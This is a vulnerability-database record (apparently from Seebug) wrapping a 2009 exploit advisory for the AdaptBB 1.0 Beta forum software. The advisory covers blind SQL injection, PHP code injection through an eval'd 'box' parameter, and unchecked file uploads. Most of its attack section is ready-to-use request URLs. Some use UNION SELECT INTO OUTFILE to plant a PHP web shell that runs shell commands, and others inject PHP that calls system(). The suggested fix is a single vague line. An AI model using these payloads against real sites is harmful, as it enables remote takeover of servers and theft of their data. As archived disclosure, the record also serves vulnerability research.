{"lastseen": "2017-11-19T15:24:54", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2017-11-19T15:24:54", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T15:24:54", "rev": 2}, "vulnersScore": 0.2}, "href": "https://www.seebug.org/vuldb/ssvid-66430", "references": [], "enchantments_done": [], "id": "SSV:66430", "title": "adaptbb 1.0b Multiple Vulnerabilities", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 2, "sourceData": "\n ******* Salvatore "drosophila" Fresta *******\r\n\r\n[+] Application: AdaptBB\r\n[+] Version: 1.0 Beta\r\n[+] Website: http://sourceforge.net/projects/adaptbb/\r\n\r\n[+] Bugs: [A] Multiple Blind SQL Injection\r\n [B] Multiple Dynamic Code Execution\r\n [C] Arbitrary File Upload\r\n\r\n[+] Exploitation: Remote\r\n[+] Date: 09 Apr 2009\r\n\r\n[+] Discovered by: Salvatore "drosophila" Fresta\r\n[+] Author: Salvatore "drosophila" Fresta\r\n[+] Contact: e-mail: drosophilaxxx@gmail.com\r\n\r\n\r\n*************************************************\r\n\r\n[+] Menu\r\n\r\n1) Bugs\r\n2) Code\r\n3) Fix\r\n\r\n\r\n*************************************************\r\n\r\n[+] Bugs\r\n\r\n\r\n- [A] Multiple Blind SQL Injection\r\n\r\n[-] Risk: medium\r\n[-] Requisites: magic_quotes_gpc = off\r\n[-] File affected: almost all of the files are \r\nvulnerable\r\n\r\nThis bug allows a guest to execute arbitrary SQL\r\nqueries.\r\n\r\n\r\n- [B] Multiple Dynamic Code Execution\r\n\r\n[-] Risk: hight\r\n[-] File affected: almost all of the files are \r\nvulnerable\r\n\r\nThis bug allows a guest to execute arbitrary php\r\ncode.\r\n\r\n...\r\n\r\nif ($_GET['box']) {\r\n$folder = $_GET['box'];\r\n}\r\n\r\n...\r\n\r\n$ddata[] = ucwords($folder);\r\n\r\n...\r\n\r\neval (" ?> ".str_replace($cdata, $ddata, stripslashes(template($view."_header")))." <?php ");\r\n\r\n...\r\n\r\n\r\n- [C] Arbitrary File Upload\r\n\r\n[-] Risk: hight\r\n[-] File affected: attach.php\r\n\r\nThis bug allows a registered user to upload \r\narbitrary files and to execute them from \r\ninc/attachments directory. This is possible \r\nbecause there are no controls on file extension \r\non the server side but only on the client side. \r\n\r\n\r\n*************************************************\r\n\r\n[+] Code\r\n\r\n\r\n- [A] Multiple Blind SQL Injection\r\n\r\nhttp://site/path/inc/attach.php?id=-1' UNION ALL SELECT '<?php system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23\r\n\r\nhttp://site/path/index.php?do=profile&user=blabla&box=-1' UNION ALL SELECT '<?php system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23\r\n\r\nhttp://site/path/index.php?do=messages&user=blabla&box=-1' UNION ALL SELECT '<?php system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23\r\n\r\nhttp://site/path/index.php?do=edit_post&id=-1' UNION ALL SELECT '<?php system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8,9 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23\r\n\r\nTo execute commands:\r\n\r\nhttp://site/path/rce.php?cmd=uname -a\r\n\r\n\r\n- [B] Multiple Dynamic Code Execution\r\n\r\nhttp://www.site.com/path/index.php?do=profile&user=blabla&box=<?php echo "<pre>"; system('ls'); echo "</pre>"?>\r\n\r\nhttp://www.site.com/path/index.php?do=messages&user=blabla&box=<?php echo "<pre>"; system('ls'); echo "</pre>"?>\r\n\r\n\r\n*************************************************\r\n\r\n[+] Fix\r\n\r\nTo fix them you must check the input properly.\r\nHowever is not recommended to store your real \r\nusername and password in the cookies.\r\n\r\n\r\n*************************************************\r\n\r\n# milw0rm.com [2009-04-09]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-66430", "type": "seebug", "immutableFields": []}

{}